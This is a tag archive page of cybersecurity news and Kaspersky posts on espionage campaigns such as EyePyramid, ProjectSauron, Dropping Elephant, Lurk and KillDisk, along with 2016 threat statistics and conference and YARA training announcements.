Home Tags Cyber Espionage

Tag: Cyber Espionage

Sneaky ‘fileless’ malware flung at Israeli targets via booby-trapped Word docs

Spies, bank raiders gravitate to growing stealth technique A newly uncovered cyber-espionage campaign targeting Israeli organisations relies on "fileless" malware hidden in Microsoft Word documents, a hacker tactic that's becoming a growing menace.…

Sneaky ‘fileless’ malware flung at Israeli targets

Spies, bank raiders gravitate to growing stealth technique A newly uncovered cyber-espionage campaign targeting Israeli organisations relies on "fileless" malware, a hacker tactic that's becoming a growing menace.…

Researchers claim China trying to hack South Korea missile defense efforts

Deployment of THAAD upsets China, seen as espionage tool.

‘Evidence of Chinese spying’ uncovered on eve of Trump-Xi summit

Gosh, this is awkward...

Evidence of Chinese cyber-espionage against the US has been uncovered on the eve of an important Sino-US presidential summit.…

Brother-and-sister duo arrested over hacking campaign targeting Italy’s bigwigs

EyePyramid operation targeted politicians and business leaders A hacking operation featuring the EyePyramid trojan successfully compromised the systems of numerous high-profile Italian targets, including two former prime ministers, say Italian police. High-profile targets were targeted by a spear-phishing campaign that served a remote-access trojan codenamed "EyePyramid" as a malicious attachment. Targets of the spying included bankers, businessmen and even several cardinals.

The president of the European Central Bank, Mario Draghi, and two former Italian prime ministers, Matteo Renzi and Mario Monti, were among targets of the campaign, according to a copy of an Italian arrest warrant obtained by Politico. The malware was used to successfully exfiltrate over 87 gigabytes worth of data – including usernames, passwords, browsing data, and other files – from compromised systems. Federico Maggi, a senior threat researcher at Trend Micro, has published a blog post here and in a technical summary (on GitHub) here. Brother and sister Giulio Occhionero, 45, and Maria Occhionero, 48, were arrested in Rome on Tuesday and detained over hacking and espionage charges related to the EyePyramid campaign, Reuters reports.
Investigators appear to be proceeding on the basis that the hacking operation was used to harvest insider intelligence as part of a criminally tainted investment strategy rather than politically motivated cyber-espionage. The "stolen data was stored in servers in Prior Lake, Minnesota, and Salt Lake City, Utah," according to a court document seen by Reuters. The FBI has seized the servers and will ship them to Italy, the head of Italy's cyber crime unit told the news agency. Hackers behind the spear-phishing campaign used the compromised email accounts of attorneys and associates in several law firms as a platform to launch the second stage of the attacks, targeting businessmen and politicians, according to Trend Micro's Maggi. ® Bootnote Grazie molto to Milan-based reader Alex for the heads-up on this interesting case, which is unsurprisingly getting a lot of coverage in the Italian press. Sponsored: Want to know more about Privileged Access Management? Visit The Register's hub

How to hunt for rare malware

At SAS 2017, on April 1st and 2nd on St. Maarten, Global Director of GReAT Costin Raiu and Principal Security Researchers Vitaly Kamluk and Sergey Mineev will provide YARA training for incident response specialists and malware researchers, who need an effective arsenal for finding malware.

During the training, the experts will give participants access to some of Kaspersky Lab internal systems, which are otherwise closed to the public, to demonstrate how the company’s malware analysts catch rare samples.

After two days, even being a newcomer, you’ll walk away with the ability to write rules and start using the tool for hunting malware. You can book your seat now — the class will be limited for maximum 15 participants. Each trainer has an impressive portfolio of cyber-espionage campaigns that they have investigated, including Stuxnet, Duqu, Flame, Gauss, Red October, MiniDuke, Turla, Careto/TheMask, Carbanak and Duqu2. Why YARA training? Protective measures that were effective yesterday don’t guarantee the same level of security tomorrow.
Indicators of Compromise (IoCs) can help you search for footprints of known malware or for an active infection.

But serious threat actors have started to tailor their tools to fit each victim, thus making IoCs much less effective.

But good YARA detection rules still allow analysts to find malware, exploits and 0-days which couldn’t be found in any other way.

The rules can be deployed in networks and on various multi scanner systems. Giveaways People who go through the training will be able to start writing relatively complex YARA rules for malware – from polymorphic keyloggers all the way up to highly complex malware – that can’t be detected easily with strings.

The GReAT trainers will teach how to balance rules, in other words how to write detection rules while minimising the risk of false-positives.

They also will share their experience of what exactly they are looking for when they write YARA rules as part of their everyday jobs. What are the requirements for participation? You don’t have to be an expert in order to go through this training.
It’s enough to have basic knowledge of how to use a TextEditor and the UNIX grep tool, and a basic understanding of what computer viruses are and what binary formats look like. You’ll also need your laptop and YARA software v. 3.4.0 installed on the machine.

Experience with malware analysis, reverse engineering and programming (especially in structured languages) will help you to learn more quickly, but this doesn’t mean that you can’t learn without it. Catching a 0-day with YARA One of the most remarkable cases in which Kaspersky Lab’s GReAT used YARA was the very famous Silverlight 0-day: the team started hunting for this after Hacking Team, the Italian company selling “legal surveillance tools” for governments and LEAs, was hacked. One of the stories in the media attracted our researchers’ attention — according to the article, a programmer offered to sell Hacking Team a Silverlight 0-day, an exploit for an obsolete Microsoft plug-in which at some point had been installed on a huge number of computers. GReAT decided to create a YARA rule based on this programmer’s older, publicly available proof-of-concept exploits. Our researchers found that he had a very particular style when coding the exploits — he used very specific comments, shell code and function names.

All of this unique information was used to write a YARA rule — the experts set it to carry out a clear task, basically saying “Go and hunt for any piece of malware that shows the characteristics described in the rule”.

Eventually it caught a new sample, it was a 0-day, and the team reported it to Microsoft immediately. If you’re a scholar… Surprisingly enough, YARA can be used for any sort of classification, such as finding documents by metadata, email and so on.
If you work with any kind of rare information and lack a competitive tool for searching for it, come to St. Maarten in April and join the training — you’ll benefit greatly. You are welcome to listen the podcast to learn about how YARA can be used in malware hunting, data analysis and incident response activities. Book a seat at sas.kaspersky.com now to hunt APTs with YARA like a GReAT ninja!

Insane blackhats behind world’s most expensive ransomware ‘forget’ to backup crypto...

Only Linux victims can decrypt warped $247,000 BlackEnergy module - and then only maybe Variants of the KillDisk data wiping malware, famous for nuking computers in Ukrainian energy utilities, is now being used in possibly the world's most expensive ransom attacks. Attackers are targeting Windows and Linux desktops and servers and demanding a laughable 222 bitcoins (US$247,000) for the data to be returned. No-one has paid; this is a good thing, even for victims laden with cash, since the attackers cannot decrypt files because encryption keys are not saved locally or transmitted to command and control servers. "Let us emphasise that the cyber criminals behind this KillDisk variant cannot supply their victims with the decryption keys to recover their files, despite those victims paying the extremely large sum demanded by this ransomware," ESET researchers Robert Lipovsky and Peter Kalnai say. The malware was first a module employed in 2015 attacks against Ukraine's Prykarpattya, Oblenergo, and Kyivoblenergo energy facilities. It is distributed most often through phishing, the tactic used by its suspected Russian authors, and is capable of wrecking thousands of different file types. Those attacks were "artistic", Lipovsky and Kalnai say, using iconography from the hacker hit show Mr Robot. The ransomware message is splashed in the overwritten GRUB bootloader and apologises for encrypting files. We're 'sorry', reads GRUB message. While the KillDisk authors utterly failed in their bid to earn money from ransomware, they avoided encryption mistakes common to other blackhats in their use of Triple-DES applied to 4096-byte file blocks with each file using different 64-bit encryption key sets. But they fell flat again opening a hole that lets Linux users decrypt files - with significant effort and some luck. Windows users have no such option at this stage. "The recent addition of ransomware functionality seems a bit unusual, as previous attacks were cyber-espionage and cyber-sabotage operations," the researchers say. "[It] seems more like a nail in the coffin, rather than a true ransomware campaign." ® Sponsored: Customer Identity and Access Management

Kaspersky Security Bulletin 2016. Review of the year. Overall statistics for...

 Download Review of the year  Download Overall statistics  Download the consolidated Kaspersky Security Bulletin 2016 Introduction If they were asked to sum up 2016 in a single word, many people around the world – particularly those in Europe and the US – might choose the word ‘unpredictable’. On the face of it, the same could apply to cyberthreats in 2016: the massive botnets of connected devices that paralysed much of the Internet in October; the relentless hacking of high profile websites and data dumps; the SWIFT-enabled bank heists that stole billions of dollars, and more. However, many of these incidents had been in fact been predicted, sometimes years ago, by the IT security industry, and the best word for them is probably ‘inevitable’. For cyberthreats, 2016 was the year when “sooner or later” became “now” #KLReport Tweet Most of all, in 2016, ransomware continued its relentless march across the world – with more new malware families, more modifications, more attacks and more victims. However, there are rays of hope, including the new, collaborative No More Ransom initiative. Kaspersky Lab has designated the revolution in ransomware its Story of the Year for 2016 and you can read more about its evolution and impact here. Elsewhere on the cybersecurity landscape, targeted cyberespionage attacks, financial theft, ‘hacktivism’ and vulnerable networks of connected devices all played their part in what has been a tense and turbulent year. This Executive Summary provides an overview of the top threats and statistics for 2016. Full details are included in the accompanying Review & Statistics. It also considers what these threats mean to organisations trying spot a breach or cyberattack. How ready are businesses to proactively prevent and mitigate a cyberthreat? What can be done to help them? Six things we learned this year that we didn’t know before 1. That the underground economy is more sophisticated and bigger than ever: xDedic – the shady marketplace In May, we uncovered a large, active cybercriminal trading platform, called xDedic. xDedic listed and facilitated the buying and selling of hacked server credentials. Around 70,000 compromised servers were on offer – although later evidence suggests that there could have been as many as 176,000 – located in organisations around the world. In most cases, the legitimate owners had no idea that one of their servers, humming away in a back room or data center, had been hijacked and was being passed from criminal to criminal. xDedic is not the first underground marketplace, but it is evidence of the growing complexity and sophistication of the black market economic ecosystem. “xDedic is a hacker’s dream, simplifying access to victims, making it cheaper and faster, and opening up new possibilities for both cybercriminals and advanced threat actors.” GReAT 2. That the biggest financial heist did not involve a stock exchange: the SWIFT-enabled transfers One of the most serious attacks in 2016 was that using the inter-bank network, SWIFT (Society for Worldwide Interbank Financial Telecommunication). In February 2016, hackers used the SWIFT credentials of Bangladesh Central Bank employees to send fraudulent transaction requests to the Federal Reserve Bank of New York, asking it to transfer millions of dollars to various bank accounts in Asia. The hackers were able to get $81 million transferred to the Rizal Commercial Banking Corporation in the Philippines and an additional $20 million to Pan Asia Banking. The campaign was cut short when the bank spotted a typo in one of the transfer requests. You can read the story here. In the following months, further bank attacks using SWIFT credentials came to light. Following the theft of $100 million many banks were forced to improve their authentication and SWIFT software update procedures #KLReport Tweet 3. That critical infrastructure is worryingly vulnerable: the BlackEnergy attacks BlackEnergy deserves a place in this list even though, strictly speaking, it took place at the end of 2015. However, it was only in early 2016 that the full effect of the BlackEnergy cyber-attack on the Ukrainian energy sector became clear. The attack was unique in terms of the damage it caused. This included disabling the power distribution system in Western Ukraine, wiping software on targeted systems and unleashing a Distributed Denial of Service (DDoS) attack on the technical support services of affected companies. Kaspersky Lab has supported the investigation into BlackEnergy since 2010, with among other things, an analysis of the tool used to penetrate the target systems. You can find our 2016 report here. The BlackEnergy cyberattack on the Ukrainian energy sector revealed the vulnerability of critical infrastructures worldwide #KLReport Tweet To help organizations working with industrial control systems (ICS) to identify possible points of weakness, Kaspersky Lab experts have conducted an investigation into ICS threats. Their findings are published in the Industrial Control Systems Threat Landscape report. 4. That a targeted attack can have no pattern: the ProjectSauron APT In 2016 we discovered the ProjectSauron APT: a likely nation-state backed cyberespionage group that has been stealing confidential data from organisations in Russia, Iran and Rwanda – and probably other countries – since June 2011. Our analysis uncovered some remarkable features: for example, the group adopted innovative techniques from other major APTs, improving on their tactics in order to remain undiscovered. Most importantly of all: tools are customized for each given target, reducing their value as Indicators of Compromise (IoCs) for any other victim. An overview of the methods available to deal with such a complex threat can be found here. ProjectSauron’s pattern-less spying platform has far-reaching implications for some basic principles of threat detection #KLReport Tweet 5. That the online release of vast volumes of data can be an influential tactic: ShadowBrokers and other data dumps 2016 saw a number of remarkable online data dumps. The most famous is probably that by a group calling itself the ShadowBrokers. On August 13, they appeared online claiming to possess files belonging to the ultimate APT predator, the Equation Group. Our research suggests there are similarities between the data dumped by ShadowBrokers and that used by the Equation Group. The initial data dump included a number of unreported zero-days, and there have been further dumps in recent months. The long-term impact of all this activity is unknown, but is has already revealed the huge and rather worrying influence such data dumps can potentially have on public opinion and debate. In 2016 we also witnessed data breaches at beautifulpeople.com, Tumblr, the nulled.io hacker forum, Kiddicare, VK.com, Sage, the official forum of DotA 2, Yahoo, Brazzers, Weebly and Tesco Bank – for motives ranging from financial gain to personal reputation blackmail. A LinkedIn hack made public in 2016 revealed over a million uses of the password ‘123456’. #KLReport Tweet 6. That a camera could be part of a global cyber-army: the insecure Internet of Things Connected devices and systems, from homes and vehicles to hospitals and smart cities, exist to make our lives safer and easier. However, many were designed and manufactured without much thought for security – and sold to people who underestimated the need to protect them with more than default factory security settings. The risk of connecting everything without proper safeguards – after 2016, need we say more? #KLReport Tweet As the world now knows, all these millions of insecure connected devices represent a powerful temptation to cybercriminals. In October, attackers used a botnet of over half a million internet-connected home devices to launch a DDoS attack against Dyn – a company that provides DNS services to Twitter, Amazon, PayPal, Netflix and others. The world was shocked, but warnings about unstable IoT security have been around for a long time. For example, in February, we showed how easy it was to find a hospital, gain access to its internal network and take control of an MRI device – locating personal data about patients and their treatment procedures and obtaining access to the MRI device file system. In April, we published the results of our research into, among other things, the vulnerability of city traffic sensors and smart ticket terminals. Manufacturers need to work with the security industry to implement ‘security-by-design’ #KLReport Tweet Other top threats Inventive APTs At least 33 countries were targeted by APTs reported on by Kaspersky Lab #KLReport Tweet In February, we reported on Operation Blockbuster, a joint investigation by several major IT security companies into the activities of the Lazarus gang, a highly malicious entity responsible for data destruction. The Lazarus group is believed to have been behind the attack on Sony Pictures Entertainment in 2014 #KLReport Tweet Adwind, is a cross-platform, multi-functional RAT (Remote Access Tool) distributed openly as a paid service, where the customer pays a fee in return for use of the malicious software. It holds the dubious distinction of being one of the biggest malware platforms currently in existence, with around 1,800 customers in the system by the end of 2015. Adwind’s malware-for-rent had a customer base of 1,800 #KLReport Tweet APTs everywhere continued to make the most of the fact that not everyone promptly installs new software updates – in May we reported that at least six different groups across the Asia-Pacific and Far East regions, including the newly discovered Danti and SVCMONDR groups, were exploiting the CVE-2015-2545 vulnerability. This flaw enables an attacker to execute arbitrary code using a specially-crafted EPS image file. A patch for the vulnerability was issued back in 2015. Over six APT groups used the same vulnerability – patched back in 2015 #KLReport Tweet New zero-days Zero-days remained a top prize for many targeted attackers. In June, we reported on a cyber-espionage campaign launched by a group named ScarCruft and code-named Operation Daybreak, which was using a previously unknown Adobe Flash Player exploit (CVE-2016-1010). Then in September we discovered a Windows zero-day, CVE-2016-3393, being used by a threat actor known as FruityArmor to mount targeted attacks. In all, new Kaspersky Lab technologies designed to identify and block such vulnerabilities helped us to uncover four zero-days in 2016. The other two are an Adobe Flash vulnerability CVE-2016-4171 and a Windows EoP (Escalation of Privilege) exploit CVE-2016-0165 . The hunt for financial gain Tricking people into either disclosing personal information or installing malware that then seizes the details for their online bank account remained a popular and successful option for cyber-thieves in 2016. Kaspersky Lab solutions blocked attempts to launch such malware on 2,871,965 devices. The share of attacks targeting Android devices increased more than four-fold. A third of banking malware attacks now target Android devices #KLReport Tweet Some APT groups were also more interested in financial gain than cyberespionage. For example, the group behind Metel infiltrated the corporate network of banks in order to automate the roll-back of ATM transactions: gang members could then use debit cards to repeatedly steal money from ATMs without ever affecting the balance on the card. At the end of 2016 this group remains active. Metel launched targeted attacks on banks – then sent teams to ATMs at night to withdraw the cash #KLReport Tweet In June, Kaspersky Lab supported the Russian police in their investigation into the Lurk gang. The collaboration resulted in the arrest of 50 suspects allegedly involved in creating networks of infected computers and the theft of more than 45 million dollars from local banks, other financial institutions and commercial organizations. During the investigation, researchers spotted that users attacked by Lurk had the remote administration software Ammyy Admin installed on their computers. This led to the discovery that that the official Ammyy Admin website had most probably been compromised, with the Trojan was downloaded to users’ computers along with the legitimate Ammyy Admin software. The takedown of the Lurk gang was the largest ever arrest of hackers in Russia #KLReport Tweet The ultimate vulnerability: people 2016 also revealed that targeted attack campaigns don’t always need to be technically advanced in order to be successful. Human beings – from hapless employees to malicious insiders – often remained the easiest access route for attackers and their tools. In July, we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using high quality social engineering combined with old exploit code and some PowerShell-based malware, the group was able to successfully steal sensitive data from high-profile diplomatic and economic organisations linked to China’s foreign relations. Dropping Elephant and Operation Ghoul confirmed the fearsome power of high quality social engineering #KLReport Tweet Further, Operation Ghoul sent spear-phishing e-mails that appeared to come from a bank in the UAE to top and middle level managers of numerous companies. The messages claimed to offer payment advice from the bank and attached a look-like SWIFT document containing malware. Cybercriminals are using insiders to gain access to telecommunications networks and subscriber data, recruiting disaffected employees through underground channels or blackmailing staff using compromising information gathered from open sources.” Threat Intelligence Report for the Telecommunications Industry Mobile advertising The main mobile threats in 2016 were advertising Trojans able to obtain ‘root’ or superuser rights on an infected Android device – a level of access that allowed them to do pretty much whatever they wanted. This included hiding in the system folder, thereby making themselves almost impossible to delete, and silently installing and launching different apps that aggressively display advertising. They can even buy new apps from Google Play. 22 of the 30 most popular Trojans in 2016 are advertising Trojans – twice as many as in 2015 #KLReport Tweet Many such Trojans were distributed through the Google Play Store: some of them were installed more than 100,000 times, and one – an infected Pokemon GO Guide app was installed more than 500,000 times. Malware distributed through Google Play was downloaded hundreds of thousands of times #KLReport Tweet One Android Trojan installed and even updated as a ‘clean’ (malware-free) app before hitting targets with an infected version. Others, including Svpeng, used the Google AdSense advertising network for distribution Further, some Trojans found new ways to bypass Android security features – in particular the screen overlays and the need to request permission before opening a new app – forcing the user to sign over the access rights the Trojan was looking for. Mobile ransomware also evolved to make use of overlays, blocking rather than encrypting data since this is generally backed-up. To read more on these stories, please download the full annual Review for 2016 here. For an in-depth look at the Statistics for 2016, please register to download the Statistics report here. The impact on business The 2016 threat landscape indicates a growing need for security intelligence The Kaspersky Security Bulletin 2016 highlights the rise of complex and damaging cybersecurity threats, many of which have a far-reaching impact on businesses. This impact is also reflected in our Corporate IT Security Risks Reports (1, 2) based on a 2016 survey of more than 4000 businesses worldwide. Among other things, the survey asked companies about the most crucial metric of incident detection and response: time. Incident detection time is critical Previously unreleased findings from the research show that the typical time required to detect an IT Security event is several days – 28.7% of companies said it took them that long to detect a security breach on average. Time required to detect an IT security event Only 8.2% of businesses managed to detect security breaches almost instantly, and for 19.1% of businesses it took several weeks to detect a serious security event. When we asked how they eventually detected a long-standing breach, the replies were revealing. Going beyond prevention Average time frame required to detect a security event, across all security eventswithin the last 12 months In this chart we combine the average time to discover a security event with the responses we received on how businesses detected a breach. Apparently, businesses that struggle to detect a breach quickly, eventually spot them through one or more of the following: an external or internal security audit, or, sadly, notification from a third party. It turns out that for these businesses a security audit of any kind is the best measure of ‘last resort’ to finally bring it to light. But should it be only a last resort? This is where our report detects an obvious discrepancy between theory and practice. Although 65% of businesses admit that a security audit is an effective security measure, less than half of the companies surveyed (48%) have conducted such audit in the last 12 months. Further, 52% of companies operate under the assumption that their IT security will inevitably be compromised at some point, although 48% are not ready to accept this. In short: many businesses find a structured detection and response strategy difficult to embrace. The cost of delay It is safe to assume that the longer it takes to detect a security breach, the higher the mitigation costs and the greater the potential damage. The results reveal the shocking truth that failure to discover an attack within a few days, results in a doubling, or more of the costs. Cost of recovery vs. time needed to discover a security breach for enterprises For enterprises, an attack undiscovered for a week or more costs 2.77 times that of a breach detected almost instantly. SMBs end up paying 3.8 times more to recover from an incident detected too late. It is clear that better detection significantly reduces business costs. But the implementation of incident detection and response strategies is quite different from ensuring proper prevention. The latter provides a choice of well-established corporate solutions. The former requires security intelligence, a deep knowledge of the threat landscape, and security talent capable of applying that expertise to the unique specifics of a company. According to our special Corporate IT Security Risks report, businesses that struggle to attract security experts end up paying twice as much for their recovery after an incident. Kaspersky Lab’s solution: turning intelligence into protection In 2016 Kaspersky Lab significantly expanded its portfolio with products like Kaspersky Anti-Targeted Attack Platform and security services like Penetration Testing and Threat Data Feeds, all to help meet customer needs for better detection and response. Our plan is to offer security intelligence via any means necessary: with a technology to detect targeted threats, a service to analyze and respond to a security event, and intelligence that helps investigate an issue properly. [embedded content] We appreciate that, for many businesses, going beyond prevention is a challenge. But even a single targeted attack that is detected early and mitigated rapidly is worth the investment – and increases the chances that the next assault on the corporate infrastructure is prevented outright.

Caribbean scuba diving with IT-security in mind

Dare to submit your research proposal before December 1, 2016 to dive into undiscovered and uncharted cybercrimes, hacks, espionage and much more at the Security Analyst Summit – April 2-6, 2017 on the Caribbean island of St. Maarten. There are four months left before Kaspersky Lab’s Security Analyst Summit on the Caribbean Island of St Maarten, an invitation-only conference. If you still haven’t submitted your individual proposal, you’d better hurry up. There’s only one week left before the SAS17 program committee will start evaluating the abstracts. The summit will welcome those with new studies and tools, vulnerability reports, creative ideas, concepts or their results; insights into nation state cyber-espionage and government surveillance; research into attacks against financial institutions and critical infrastructure; mobile systems the IoT cyber risk landscape observations. You’ll join the leading voices in the IT security industry – the chosen few – for knowledge and information sharing: senior executives from business organizations, global law enforcement agencies and CERTs, independent researchers and journalists. Previous events were joined by members of leading global companies, such as Samsung, Adobe, Microsoft, BlackBerry, CISCO, Boeing, Interpol, the World Bank, Team Cymru, The ShadowServer Foundation, ICSA Labs and Fidelis Cybersecurity Solutions. And every year SAS proves that IT security has no borders. Requirements for submissions: Individual proposals should be no more than 350 words in length. SAS has a ground rule: nobody gets to speak from the stage for more than 30 minutes — this is the longest duration allowed for a keynote presentation — while everyone else gets 20 minutes maximum. Proposals should include the title of the paper and should clearly spell out the focus and goal of the presentation. The deadline for submissions is December 1, 2016. You can send your abstract directly to sasCFP@kaspersky.com. The Program committee consists of six independent members, who evaluate the papers separately. They are Kaspersky Lab and external experts who share the SAS core value: uncompromising research. Have you been good this year? Santa The program committee will check soon. Submit your abstract, find SPF20+ sunscreen, join the SAS family, follow @KasperskySAS and see how much fun it is — SAS2014, SAS2015 and SAS2016!

IT threat evolution Q3 2016

 Download the full report (PDF) Overview Targeted attacks and malware campaigns Dropping Elephant Targeted attack campaigns don’t need to be technically advanced in order to be successful.
In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware this group was able to steal sensitive data from its victims. This group, which has been active since November 2015, targets high profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims. The attackers use a combination of spear-phishing e-mails and watering-hole attacks.

The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server.

The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system: once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins. In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries #KLreport #Infosec Tweet The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites.
If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object.

The attackers sometimes e-mail links to their watering-hole website.
In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets. The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented.

At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware.

Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering. ProjectSauron In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization.

Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors. ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques.

The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered. One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used.

This makes the use of traditional Indicators of Compromise (IoC) almost useless.

This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS) enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks. Key features of ProjectSauron: core implants that are unique for each victim; use of legitimate software update scripts; use of backdoors that download new modules or run commands in memory only; focus on information relating to custom network encryption software; use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in Flame and Animal Farm attacks; use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data; use of multiple exfiltration mechanisms to conceal transfer of data in day-to-day traffic. The method used to initially infect victims remains unknown. The single use of unique methods, such as control server, encryption keys and more, in addition to the adoption of cutting-edge techniques from other major threats groups, is new.

The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here. ShadowBrokers In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group.

They provided links to two PGP encrypted archives.

They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation). Having uncovered the Equation group in February 2015, we were interested in examining the first archive.
It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013. The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively).

The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations.

The implementation is functionally identical with that found in the Equation malware – and has not been seen elsewhere. The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group. Operation Ghoul In June, we noticed a wave of spear-phishing e-mails with malicious attachments.

The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE.

The messages claimed to offer payment advice from the bank and included an attached SWIFT document.

But the archive really contained malware.

Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab. The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia.

Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations. The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications.

This data is sent to the group’s C2 servers. The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market. The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy. Malware stories Lurk In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks.

The police estimate the losses caused by this Trojan at around $45 million. During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software, Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victim’s computers along with the legitimate software. The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested.
It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site. The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in.

The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware.

This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’.

The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks).

The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group. In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT Tweet The group was involved in other side activities too.

For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks. Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan.

The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here. Ransomware Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16).

The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016. One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom.

The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus. The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting.
It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective. Ded Cryptor was just one of many ransomware programs spawned by EDA2.

Another such program that we saw recently was Fantom.

This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen This is displayed while Fantom is encrypting the victim’s files in the background.

The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message. There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks. It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk.
In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data.
